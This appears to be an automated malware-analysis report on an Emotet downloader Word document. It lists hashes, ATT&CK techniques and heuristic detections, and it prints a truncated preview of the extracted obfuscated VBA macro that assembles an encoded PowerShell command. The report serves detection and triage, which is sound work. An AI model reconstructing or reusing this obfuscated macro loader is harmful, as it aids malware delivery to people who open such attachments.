Emotet Office (OLE) malware analysis — malicious · 8639f927de751bb0

MALICIOUS

Office (OLE)

225.0 KB Created: 2018-06-28 13:49:00 Authoring application: Microsoft Office Word First seen: 2019-06-27

MD5: d0867d19cabe835ca964041d649a17ce SHA-1: d870a0ded7aeffadc1ee7f7ddf8d337ae0d7e158 SHA-256: 8639f927de751bb061c0751033cf0893395e565adc103aed1a2f8e84424f28a6

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample was identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6958980-0', indicating a known downloader. The presence of a critical 'Shell()' call within the VBA macros, specifically in the AutoOpen function, strongly suggests the execution of a secondary payload. This aligns with the typical behavior of Emotet, which often uses macro-enabled documents to download and install further malware.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6958980-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6958980-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11809 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11809 bytes
SHA-256: `ae1a91396e9e06f8fa039365863719c5fe6a585e072b694adce9f274d58e9b56`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DvXzFrbQ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "SEzhncotjwZdl" Function PjzwEX() On Error Resume Next UMZwNw _ = 62697 + Atn(713) / 84970 / _ Round(57327) / 71986 / CInt(ZBtmw) woHzmJ = ChrB(40045 + _ Sin(JQbVXi * CLng(ZojXN + 65191) _ + 91319 _ + jLSPXv)) jhQOWc = "HELL " + " " + " " + " " + " " + " " GCiYY _ = 55667 + Atn(63261) / 41291 / _ Round(49735) / 31280 / CInt(bpPZWG) LzNJP = ChrB(72555 + _ Sin(CzanU * CLng(wqlKYn + 98071) _ + 11496 _ + sSJGjG)) KmToq = " " + " " + Chr(34) + " $" + Chr(40) + "sEt-" + "VarIAbL" + "E 'OfS' " + " ''" + Chr(41) + " " + Chr(34) + " " + Chr(43) + " [st" + "RinG]" + Chr(40) + " " + Chr(40) + "46 ,97 " + ",71 " ZHoLI _ = 24052 + Atn(93027) / 19585 / _ Round(93175) / 75395 / CInt(WVdGhF) jkDFA = ChrB(68770 + _ Sin(BjGvA * CLng(CvwZS + 98308) _ + 17157 _ + kubOlq)) PzpPEOF = ", 10" + "0, 55" + " , 1" + "00, 111 ," + " 125," + "39 , 101" + ", 104,9" + "6 , 111" + " , 105,1" + "26 ," + "42,68, " kzmkEk _ = 4621 + Atn(43646) / 5904 / _ Round(39302) / 13957 / CInt(EGcpP) iubZDn = ChrB(66610 + _ Sin(kwpbrP * CLng(iQlTKv + 46378) _ + 99996 _ + tFLuE)) tcZkX = "111 ,126 " + ", 36 ,93 " + ", 111,1" + "04, 73 ," + "102 ,9" + "9, 111," + "100,126 " + ",49, 46 " HEMRGw _ = 1342 + Atn(20487) / 89081 / _ Round(99255) / 4245 / CInt(zFhbd) LZqqVF = ChrB(2140 + _ Sin(uDjwb * CLng(rGokPZ + 16579) _ + 94772 _ + GrUHmY)) LDtoC = ",94 ,70,6" + "6,55 ,45" + ", 98 ," + " 126 ,12" + "6, 122 ,4" + "8 ,37" + " , 37," + " 125 ," rRcTii _ = 78310 + Atn(32976) / 67260 / _ Round(14430) / 31913 / CInt(BziwY) QtRwM = ChrB(7596 + _ Sin(OvjzBz * CLng(iALOW + 14958) _ + 10589 _ + RXBHI)) tXwsHJ = " 125," + "125,36,97" + " ,101" + ",120" + ",111,1" + "02 , " + "101, 12" PjzwEX = jhQOWc + KmToq + PzpPEOF + tcZkX + LDtoC + tXwsHJ vjcvw _ = 88662 + Atn(42515) / 58880 / _ Round(55151) / 89934 / CInt(YkUiF) hKCSB = ChrB(72237 + _ Sin(ZQIDc * CLng(uEvaSO + 14710) _ + 6912 _ + CsDXR)) End Function Function CnIjzc() On Error Resume Next wXkiM _ = 10445 + Atn(39177) / 94462 / _ Round(12614) / 81351 / CInt(vMVflS) izAcJ = ChrB(3768 + _ Sin(zObHK * CLng(iUFbs + 45263) _ + 46901 _ + oaHok)) XouiaOzG = "6, 101 " + ",103" + " ,10" + "1, 126, 9" + "9 , " + "124 , 36" + ", 100 ,1" TvhZR _ = 48595 + Atn(2599) / 78440 / _ Round(33060) / 17532 / CInt(NiKOr) pwbPaG = ChrB(88702 + _ Sin(OuluZs * CLng(YdACjC + 81344) _ + 70645 _ + pDwGf)) cazcGqUhTF = "11 ," + "126 ,3" + "7 , " + "109 , " + "123, " + "61,79" + " ,93" + ", 50 , 3" + "7 ,74," + "98 ," + " 126," NBzhSs _ = 17133 + Atn(17806) / 86585 / _ Round(77876) / 76373 / CInt(CiPurQ) oFKMKq = ChrB(98703 + _ Sin(OaXJn * CLng(Zhkwr + 51070) _ + 92918 _ + THNsP)) XzPkkZs = "126 " + ",122, 4" + "8 ,37" + ", 37, 12" + "5,125 ," + " 125," + " 36 ,10" + "0, 111 ," + "125,12" + "1,126 " + ", 111, " + "109 , " GzuLjZ _ = 81027 + Atn(66981) / 5234 / _ Round(78191) / 75126 / CInt(SjuiVi) fdzizz = ChrB(80574 + _ Sin(YmDwRb * CLng(FQfLd + 27261) _ + 33832 _ + iwJAHQ)) iYPjTJw = "36,105, 1" + "01 ," + " 103, 37" + " , 73" + ",123,73 ," + " 107 , " + "37, 7" + "4 , 98 ," + "126 , 12" + "6, 1" + "22, 4" + "8 ,37 , " kljsk _ = 19006 + Atn(16261) / 36888 / _ Round(94204) / 22482 / CInt(oRwwpV) GadDJ = ChrB(2888 + _ Sin(NmTioz * CLng(UDBSPY + 82760) _ + 4096 _ + ziAmZA)) XZMLHrmwc = "37, 125 ," + " 125, 12" + "5 , 36," + "120 ,101," + "121 " + ", 111" + " ,102," + "124, 9" + "9, 3" + "6 , 105," + "102,37" fGojBp _ = 84017 + Atn(64579) / 54028 / _ Round(64443) / 13555 / CInt(XpkIM) UNvja = ChrB(93879 + _ Sin(EdjUJ * CLng(MNsnc + 99836) _ + 30160 _ + iLTqiR)) DiHdzPVO = ",100 , " + "57 , " + "123,89 ,9" + "4 ,66 ," + "37 ,74 ,9" + "8, 12" + "6 ,12" + "6 , 12" + "2,48 ," + "37,37," iIMZo _ = 58399 + Atn(8923 ... (truncated)

SHA-256: ae1a91396e9e06f8fa039365863719c5fe6a585e072b694adce9f274d58e9b56

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DvXzFrbQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SEzhncotjwZdl"
Function PjzwEX()
On Error Resume Next
UMZwNw _
= 62697 + Atn(713) / 84970 / _
Round(57327) / 71986 / CInt(ZBtmw)
woHzmJ = ChrB(40045 + _
Sin(JQbVXi * CLng(ZojXN + 65191) _
 + 91319 _
+ jLSPXv))
jhQOWc = "HELL  " + "     " + "       " + "     " + "    " + "         "
GCiYY _
= 55667 + Atn(63261) / 41291 / _
Round(49735) / 31280 / CInt(bpPZWG)
LzNJP = ChrB(72555 + _
Sin(CzanU * CLng(wqlKYn + 98071) _
 + 11496 _
+ sSJGjG))
KmToq = "     " + "    " + Chr(34) + " $" + Chr(40) + "sEt-" + "VarIAbL" + "E  'OfS' " + " ''" + Chr(41) + " " + Chr(34) + " " + Chr(43) + " [st" + "RinG]" + Chr(40) + " " + Chr(40) + "46 ,97 " + ",71 "
ZHoLI _
= 24052 + Atn(93027) / 19585 / _
Round(93175) / 75395 / CInt(WVdGhF)
jkDFA = ChrB(68770 + _
Sin(BjGvA * CLng(CvwZS + 98308) _
 + 17157 _
+ kubOlq))
PzpPEOF = ", 10" + "0, 55" + " , 1" + "00, 111 ," + " 125," + "39 , 101" + ", 104,9" + "6 , 111" + " , 105,1" + "26 ," + "42,68, "
kzmkEk _
= 4621 + Atn(43646) / 5904 / _
Round(39302) / 13957 / CInt(EGcpP)
iubZDn = ChrB(66610 + _
Sin(kwpbrP * CLng(iQlTKv + 46378) _
 + 99996 _
+ tFLuE))
tcZkX = "111 ,126 " + ", 36 ,93 " + ", 111,1" + "04, 73 ," + "102 ,9" + "9, 111," + "100,126 " + ",49, 46 "
HEMRGw _
= 1342 + Atn(20487) / 89081 / _
Round(99255) / 4245 / CInt(zFhbd)
LZqqVF = ChrB(2140 + _
Sin(uDjwb * CLng(rGokPZ + 16579) _
 + 94772 _
+ GrUHmY))
LDtoC = ",94 ,70,6" + "6,55 ,45" + ", 98 ," + " 126 ,12" + "6, 122 ,4" + "8 ,37" + " , 37," + " 125 ,"
rRcTii _
= 78310 + Atn(32976) / 67260 / _
Round(14430) / 31913 / CInt(BziwY)
QtRwM = ChrB(7596 + _
Sin(OvjzBz * CLng(iALOW + 14958) _
 + 10589 _
+ RXBHI))
tXwsHJ = " 125," + "125,36,97" + " ,101" + ",120" + ",111,1" + "02 , " + "101, 12"
PjzwEX = jhQOWc + KmToq + PzpPEOF + tcZkX + LDtoC + tXwsHJ
vjcvw _
= 88662 + Atn(42515) / 58880 / _
Round(55151) / 89934 / CInt(YkUiF)
hKCSB = ChrB(72237 + _
Sin(ZQIDc * CLng(uEvaSO + 14710) _
 + 6912 _
+ CsDXR))
End Function
Function CnIjzc()
On Error Resume Next
wXkiM _
= 10445 + Atn(39177) / 94462 / _
Round(12614) / 81351 / CInt(vMVflS)
izAcJ = ChrB(3768 + _
Sin(zObHK * CLng(iUFbs + 45263) _
 + 46901 _
+ oaHok))
XouiaOzG = "6, 101 " + ",103" + " ,10" + "1, 126, 9" + "9 , " + "124 , 36" + ", 100 ,1"
TvhZR _
= 48595 + Atn(2599) / 78440 / _
Round(33060) / 17532 / CInt(NiKOr)
pwbPaG = ChrB(88702 + _
Sin(OuluZs * CLng(YdACjC + 81344) _
 + 70645 _
+ pDwGf))
cazcGqUhTF = "11 ," + "126 ,3" + "7 , " + "109 , " + "123, " + "61,79" + " ,93" + ", 50 , 3" + "7 ,74," + "98 ," + " 126,"
NBzhSs _
= 17133 + Atn(17806) / 86585 / _
Round(77876) / 76373 / CInt(CiPurQ)
oFKMKq = ChrB(98703 + _
Sin(OaXJn * CLng(Zhkwr + 51070) _
 + 92918 _
+ THNsP))
XzPkkZs = "126 " + ",122, 4" + "8 ,37" + ", 37, 12" + "5,125 ," + " 125," + " 36 ,10" + "0, 111 ," + "125,12" + "1,126 " + ", 111, " + "109 , "
GzuLjZ _
= 81027 + Atn(66981) / 5234 / _
Round(78191) / 75126 / CInt(SjuiVi)
fdzizz = ChrB(80574 + _
Sin(YmDwRb * CLng(FQfLd + 27261) _
 + 33832 _
+ iwJAHQ))
iYPjTJw = "36,105, 1" + "01 ," + " 103, 37" + " , 73" + ",123,73 ," + " 107 , " + "37, 7" + "4 , 98 ," + "126 , 12" + "6, 1" + "22, 4" + "8 ,37 , "
kljsk _
= 19006 + Atn(16261) / 36888 / _
Round(94204) / 22482 / CInt(oRwwpV)
GadDJ = ChrB(2888 + _
Sin(NmTioz * CLng(UDBSPY + 82760) _
 + 4096 _
+ ziAmZA))
XZMLHrmwc = "37, 125 ," + " 125, 12" + "5 , 36," + "120 ,101," + "121 " + ", 111" + " ,102," + "124, 9" + "9, 3" + "6 , 105," + "102,37"
fGojBp _
= 84017 + Atn(64579) / 54028 / _
Round(64443) / 13555 / CInt(XpkIM)
UNvja = ChrB(93879 + _
Sin(EdjUJ * CLng(MNsnc + 99836) _
 + 30160 _
+ iLTqiR))
DiHdzPVO = ",100 , " + "57 , " + "123,89 ,9" + "4 ,66 ," + "37 ,74 ,9" + "8, 12" + "6 ,12" + "6 , 12" + "2,48 ," + "37,37,"
iIMZo _
= 58399 + Atn(8923
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.